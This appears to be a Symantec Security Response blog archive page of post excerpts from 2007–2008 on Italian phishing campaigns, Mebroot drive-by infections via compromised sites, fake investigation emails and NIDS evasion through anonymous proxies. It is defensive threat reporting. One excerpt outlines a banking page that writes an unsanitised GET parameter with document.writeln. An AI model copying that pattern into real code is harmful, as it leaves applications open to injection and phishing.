Video Screencast Help
Search Video Help Close Back
to help
New in the Rewards Catalog: Vouchers for "Symantec Technical Specialist" and "Symantec Certified Specialist" exams.

Security Response

Showing posts tagged with Security Response remove filter
Showing posts by Andrea DelMiglio remove filter
Election Time in Italy, Complete with Trojan
Andrea DelMiglio | 11 Apr 2008 | 0 comments

Symantec has been notified that the Web site ladestra.info, a site related to a right-wing Italian political party, has been compromised. The Web site is hosting a malicious iframe that leads to a typical browser exploit using the Neosploit tool, which forces an infected computer to install the newest version of Trojan.Mebroot.

Using elections as a channel for spreading malicious code is something we have already seen (...

Read more
Mebroot Spreading through High-Traffic, Compromised Web Sites
Andrea DelMiglio | 01 Apr 2008 | 0 comments

Symantec is tracking more and more
high-traffic Web sites that become compromised and then used to spread
malicious code. After the breach our MSS team spotted out on Tata, we have been notified of another Web site with a similar issue.



Today the Italian Web site www.emule-italia.it had been compromised and was hosting an obfuscated script:





The script, when deobfuscated, was showing an iframe pointing to
http://[REMOVED]...

Read more
You’re Under Investigation!
Andrea DelMiglio | 22 Feb 2008 | 0 comments

Earlier this afternoon in Italy hundreds ofthousands of people received an email from a “friend” stating(approximately) the following:

You’re under investigation! Hide everything and be quick!!!Your name appeared this morning together with 150 more persons on thewebsite of CAFF in Rome. Check it by yourself, you’re on January’slist: the website is the following: http://www.site.tld/caff/

The email is relatively convincing and Symantec believes many users have actually visited the Web site:

The Web site look and feel is very similar to other Italiangovernment Web sites and also the choice of the...

Read more
"Referer" Field Used in the Battle Against Online Fraud
Andrea DelMiglio | 10 Jan 2008 | 0 comments

The "referer" [sic] header is generallyused to track back-links in order to understand how a certain Web siteis being reached by its visitors (hyperlinks on other Web sites, searchengines, etc.) According to the RFC2616,“...the Referer request-header field allows the client to specify, forthe server's benefit, the address (URI) of the resource from which theRequest-URI was obtained (the "referrer", although the header field ismisspelled).”

In the online fraud arena, the referrer field can also be used todetect new phishing Web sites. Let’s use as an example the followingphishing site (which also happens to be a Rock Phish attack):

...

Read more
Phishing Attacks Exploiting Injection Flaws: The Importance of Application Security
Andrea DelMiglio | 08 Jan 2008 | 0 comments

As discussed in the past,cross site scripting (XSS) can be exploited by phishers to build reallyeffective attacks. Today we have analyzed another similar attack thatincludes some enhanced features. The attack was exploiting an injectionflaw in an Internet banking application, specifically located in themodule used to display warning messages to users.

The function took a single GET parameter:

https://www.well-known-bank.com/popup.asp?msg=[ASCII_encoded_message_to_display]

And then returned a page with the following in the body:

document.writeln([decoded_messages]);

Obviously the aim here is to have a single page display warningsthat are available to every module in the application. Because theinput was not properly sanitized the attackers used...

Read more
Yet Another Way to Evade NIDS (and Spread Malware)
Andrea DelMiglio | 05 Nov 2007 | 0 comments

Anonymous proxy services are onlineapplications that enable users to surf the Web with enhanced privacy.These applications act as an SSL proxy between the user and the Website to be visited, thus masking the IP address and providingadditional privacy features, such as referrer hiding, script removal,cookies removal, and URL encoding. Proxify is one provider of these services, but many more are available on the Internet.

Although we believe online privacy is something we always need to take care of,the use of these...

Read more
The Email Service Provider’s Role in the Battle Against Online Fraud
Andrea DelMiglio | 29 Oct 2007 | 0 comments

As anticipated in my first blog post,email service providers play a central role in the battle againstonline fraud. This is because they are often the only organization toown the data needed to support financial institutions and lawenforcement agencies in prosecuting criminals.

Most phishing sites are hosted on compromised Web servers and in thepast, stolen accounts were stored on local log files that phishers usedto save, using rather standard filenames (like “data.log” or “cc.txt,”where “cc” obviously stands for credit card). Web servers withdirectory listings that were enabled together with phishing kitanalysis quickly made this simple technique ineffective, becausefinancial institutions were able to read those files as well.Therefore, they were able to block stolen Internet banking accounts andcredit cards, thus...

Read more
Online Fraud in Italy: Analysis of 5830 Phishing Attacks
Andrea DelMiglio | 30 Jul 2007 | 0 comments

Since May, phishing attacks against Italian banks have been a visiblebut rather limited phenomenon. Most financial institutions reactedquickly, setting-up proper fraud management processes, educationcampaigns for end users and technical countermeasures since early 2006.But in the last three months, Italian mailboxes have been flooded bymillions of phishing emails, moving the problem to the next level.

onlinefraud1.jpg
Number of single URLs per month (July 07 data includes attacks until July 27th)
(Click image for larger view)

As the graph illustrates, the number of attacks grew 14 times since the2006 peak (127 in August) to the current 2007 peak (1735 last May).Attack...

Read more

Technical Support

Symantec.com

Store

Community Stats

Total Content Items
Members
258,918